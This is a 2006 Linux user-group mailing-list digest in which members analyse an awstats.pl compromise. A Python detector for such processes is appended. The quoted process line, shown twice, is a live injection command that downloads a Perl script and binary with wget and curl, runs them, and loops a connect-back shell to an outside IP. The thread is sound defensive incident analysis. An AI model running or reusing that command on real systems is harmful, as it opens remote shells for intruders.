Roberto R. de los Santos Jr.
Systems Associate
Philippines / System department
AGB Nielsen Media Research
1st Level RCC Center, #104 Shaw Blvd, Pasig City, 1603 (Philippines)
t: (+632) 7473882 up to 87
f: (+632) 6357997
m: +639178738246

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of [EMAIL PROTECTED]
Sent: Monday, May 08, 2006 12:00 PM
To: [email protected]
Subject: PLUG Digest, Vol 14, Issue 16

Send PLUG mailing list submissions to
        [email protected]

To subscribe or unsubscribe via the World Wide Web, visit
        https://lists.hosting.qsr.com.ph/mailman/listinfo/plug
or, via email, send a message with subject or body 'help' to
        [EMAIL PROTECTED]

You can reach the person managing the list at
        [EMAIL PROTECTED]

When replying, please edit your Subject line so it is more specific
than "Re: Contents of PLUG digest..."

Today's Topics:

   1. Re: awstats.pl (Paul Patrick Carpio Prantilla)
   2. Re: awstats.pl (Eduardo Tongson)
   3. Re: awstats.pl (Norbert P. Copones)
   4. Re: awstats.pl (Happy Kamote Foundation)
   5. Re: awstats.pl (Paul Patrick C. Prantilla)

----------------------------------------------------------------------

Message: 1
Date: Mon, 08 May 2006 10:45:12 +0800
From: Paul Patrick Carpio Prantilla <[EMAIL PROTECTED]>
Subject: Re: [plug] awstats.pl
To: "Philippine Linux Users' Group (PLUG) Technical Discussion List" <[email protected]>
Message-ID: <[EMAIL PROTECTED]>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed

Hello Kelsey,

awstats has a good history of exploits against it, and it appears to be
commonly exploited in redhat systems. Unless that's you downloading
"ping.txt" or "ping" --which is apparently a perl exploit that most
likely takes an IP address and port for its two arguments-- those logs
(or at least, set of commands) look like exploit attempts.

-Paul Patrick C. Prantilla

Kelsey Hartigan Go wrote:
> Any vulnerability in awstats.pl?
>
> I suddenly have these processes running...
>
> 6086 ?  S   0:00 /usr/bin/perl /var/www/cgi-bin/awstats.pl
> 6087 ?  R  81:06 sh -c echo ;echo b_exp;wget http://219.84.105.36/ping.txt;mv ping.txt temp2006;perl temp2006 220.227.100.4 3303;wget http://219.84.105.36/ping;chmod +x ping;./ping 220.227.100.4 3303;curl -o ping http://219.84.105.36/ping;chmod +x ping;./ping 220.227.100.4 3303;cd /tmp/;curl -o temp2006 http://219.84.105.36/ping.txt;while [ 1 ];do perl temp2006 220.227.100.4 3303;done;wget http://219.84.105.36/ping;chmod +x ping;./ping 220.227.100.4 3303;curl -o ping http://219.84.105.36/ping;chmod +x ping;./ping 220.227.100.4 3303;echo e_exp;%00/awstats.w.x.y.z.conf
>
> where w.x.y.z is my public ip...
>
> anybody know what this is and what it's trying to do...
>
> ------------------------------------------------------------------------
>
> _________________________________________________
> Philippine Linux Users' Group (PLUG) Mailing List
> [email protected] (#PLUG @ irc.free.net.ph)
> Read the Guidelines: http://linux.org.ph/lists
> Searchable Archives: http://archives.free.net.ph

------------------------------

Message: 2
Date: Mon, 8 May 2006 10:48:53 +0800
From: "Eduardo Tongson" <[EMAIL PROTECTED]>
Subject: Re: [plug] awstats.pl
To: "Philippine Linux Users' Group (PLUG) Technical Discussion List" <[email protected]>
Message-ID: <[EMAIL PROTECTED]>
Content-Type: text/plain; charset=UTF-8; format=flowed

<http://secunia.com/advisories/19969/>

> anybody know what this is and what it's trying to

rudimentary connect back shell. ping would be a static netcat binary.

- ed

------------------------------

Message: 3
Date: Mon, 8 May 2006 11:12:18 +0800 (PHT)
From: "Norbert P. Copones" <[EMAIL PROTECTED]>
Subject: Re: [plug] awstats.pl
To: "Philippine Linux Users' Group (PLUG) Technical Discussion List" <[email protected]>
Message-ID: <CgpFB1VFEAY=:[EMAIL PROTECTED]>
Content-Type: text/plain;charset=iso-8859-1

On Mon, May 8, 2006 10:45 am, Paul Patrick Carpio Prantilla wrote:
> Hello Kelsey,
>
> awstats has a good history of exploits against it, and it appears to be
> commonly exploited in redhat systems. Unless that's you downloading
> "ping.txt" or "ping" --which is apparently a perl exploit that most
> likely takes an IP address and port for its two arguments-- those logs
> (or at least, set of commands) look like exploit attempts.

from what i understand, this doesn't look like a log only but actual
processes running on his system. and yes there are many vulnerabilities in
awstats.
------------------------------

Message: 4
Date: Mon, 8 May 2006 11:42:09 +0800
From: "Happy Kamote Foundation" <[EMAIL PROTECTED]>
Subject: Re: [plug] awstats.pl
To: [EMAIL PROTECTED], "Philippine Linux Users' Group (PLUG) Technical Discussion List" <[email protected]>
Message-ID: <[EMAIL PROTECTED]>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed

Obviously if awstats is properly configured/patched then it will not run
this process

6087 ? R 81:06 sh -c echo ;echo b_exp;wget http://219.84.105.36/ping.txt;mv ping.txt temp2006;perl temp2006 220.227.100.4 3303;wget http://219.84.105.36/ping;chmod +x ping;./ping 220.227.100.4 3303;curl -o ping http://219.84.105.36/ping;chmod +x ping;./ping 220.227.100.4 3303;cd /tmp/;curl -o temp2006 http://219.84.105.36/ping.txt;while [ 1 ];do perl temp2006 220.227.100.4 3303;done;wget http://219.84.105.36/ping;chmod +x ping;./ping 220.227.100.4 3303;curl -o ping http://219.84.105.36/ping;chmod +x ping;./ping 220.227.100.4 3303;echo e_exp;%00/awstats.w.x.y.z.conf

and using a bit of common sense, you'll know that it had put in something
on your box which is particularly malicious.

Let's try to trim this down (since i have lots of time on my hands) -
smells like a spawned sh shell.

wget http://219.84.105.36/ping.txt
mv ping.txt temp2006
perl temp2006 220.227.100.4 3303 : (smells like a backdoor)

(oops this was unsuccessful, kiddie tries again using curl)

cd /tmp/
curl -o temp2006 http://219.84.105.36/ping.txt
perl temp2006 220.227.100.4 3303;done;wg

(oops! this was unsuccessful too! 3 is a charm! this time comes
precompiled *Grin*)

wget http://219.84.105.36/ping
chmod +x ping; ./ping 220.227.100.4 3303

and so on and so forth.. ;) ;)

------------------------------

Message: 5
Date: Mon, 08 May 2006 11:51:28 +0800
From: "Paul Patrick C. Prantilla" <[EMAIL PROTECTED]>
Subject: Re: [plug] awstats.pl
To: [EMAIL PROTECTED], "Philippine Linux Users' Group (PLUG) Technical Discussion List" <[email protected]>
Message-ID: <[EMAIL PROTECTED]>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed

Hi Norbert,

Yes, you're right. It wasn't apparent to me at first that those were
just two lines.

-Paul Patrick C. Prantilla

>
> from what i understand, this doesn't look like a log only but actual
> processes running on his system. and yes there are many vulnerabilities in
> awstats.

------------------------------

End of PLUG Digest, Vol 14, Issue 16
************************************
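Added example, not part of the digest above: a small Python check in the spirit of the thread's advice to look at the actual running processes rather than only the logs. It scans a `ps`-style listing for the three traits of the injected command the thread dissects: a shell that downloads a payload and runs it, a `while [ 1 ]` respawn loop, and a trailing `%00/awstats.*.conf` config path (the sign that the command was smuggled in through an awstats parameter). The listing is constructed for the example, with RFC 5737 documentation addresses instead of the thread's; `find_suspicious` and the indicator names are my own.

```python
import re
from typing import Dict, List

# Constructed sample ps listing (pid, tty, stat, time, command), modelled on the
# one posted in the thread but using documentation addresses.
SAMPLE_PS = """\
 6085 ?        S      0:00 /usr/sbin/httpd
 6086 ?        S      0:00 /usr/bin/perl /var/www/cgi-bin/awstats.pl
 6087 ?        R     81:06 sh -c echo ;echo b_exp;wget http://203.0.113.10/ping.txt;mv ping.txt temp2006;perl temp2006 198.51.100.7 3303;cd /tmp/;while [ 1 ];do perl temp2006 198.51.100.7 3303;done;echo e_exp;%00/awstats.w.x.y.z.conf
 6090 ?        S      0:00 sh -c /usr/bin/logrotate /etc/logrotate.conf
"""

PS_LINE = re.compile(r"^\s*(\d+)\s+(\S+)\s+(\S+)\s+(\d+:\d+)\s+(.*)$")

# Each indicator is one trait of the injected command discussed in the thread.
INDICATORS = {
    # fetch a file from the network, then run it within the same shell command
    "fetch_and_execute": re.compile(r"\b(wget|curl)\b.*?(chmod \+x|\bperl |\./)"),
    # `while [ 1 ]` keeps the connect-back attempts alive indefinitely
    "respawn_loop": re.compile(r"while\s*\[\s*1\s*\]"),
    # a %00 (NUL) followed by an awstats config path: the command was passed
    # through an awstats parameter that expects a config-file name
    "config_path_tail": re.compile(r"%00/awstats\.\S*\.conf\s*$"),
}


def find_suspicious(ps_lines: List[str]) -> List[Dict[str, object]]:
    """Return [{pid, cmd, reasons}] for every `sh -c` command that trips an indicator."""
    hits = []
    for line in ps_lines:
        m = PS_LINE.match(line)
        if not m:
            continue
        pid, cmd = int(m.group(1)), m.group(5)
        if not cmd.startswith("sh -c "):
            continue  # only one-shot shells, which is what a CGI command injection spawns
        reasons = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
        if reasons:
            hits.append({"pid": pid, "cmd": cmd, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_PS.splitlines()):
        print(f"pid {hit['pid']}: {', '.join(hit['reasons'])}")
```

Feed it the output of `ps ax` on the affected host; a hit on a child of awstats.pl, like pid 6087 here, is the process to kill and the box to treat as compromised.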

